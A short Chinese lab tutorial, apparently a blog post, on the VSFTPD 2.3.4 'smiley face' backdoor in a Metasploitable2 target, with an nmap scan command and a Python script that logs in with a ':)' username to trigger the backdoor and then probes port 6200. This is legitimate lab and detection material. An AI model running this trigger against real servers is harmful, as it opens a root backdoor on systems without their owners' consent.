使用python脚本检测metaspolit2靶机中的笑脸漏洞

136 阅读1分钟

笑脸漏洞

  • 笑脸漏洞(Smile漏洞)是一个存在于VSFTPD 2.3.4版本中的安全漏洞,也被称为后门漏洞。这个漏洞是由于开发者在代码中留下的一个设计失误导致的。当FTP服务器的版本为VSFTPD 2.3.4,并且在登录时输入的用户名中包含特殊字符“:)”(笑脸),服务器会自动打开6200端口,允许攻击者通过这个端口以root权限执行系统命令,从而可能完全控制系统。

环境

  • kali IP:192.168.193.130
  • 靶机IP:192.168.193.136
  • image.png

利用nmap进行漏洞检测

  • 命令:nmap -T4 -A -Pn -vv 靶机ip
  • QQ20241028-131627.png

利用python脚本检测笑脸漏洞

  • python代码
#这两行代码导入了Python的`socket`模块和`ftplib`模块中的`FTP`类。
#`socket`模块用于网络通信,`FTP`类用于与FTP服务器进行交互。
import socket
from ftplib import FTP

url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'root:)'  # 用户名必须包含:)这两个字符
password = 'anonymous'  # 密码随便啥都行
try:
    ftp.connect(url, 21, timeout=10)  # 使用ftp登录,设置延时10秒
    ftp.login(username, password)
    ftp.quit()
except:
    print("完成登录检测")
try:
    s = socket.socket()  # 使用socket函数来检测是否有漏洞存在
    s.connect((url, 6200))
    s.close()
    print("存在微笑漏洞")
except:
    print("没有发现笑脸漏洞!")
  • 代码及运行结果
  • QQ20241028-132150.png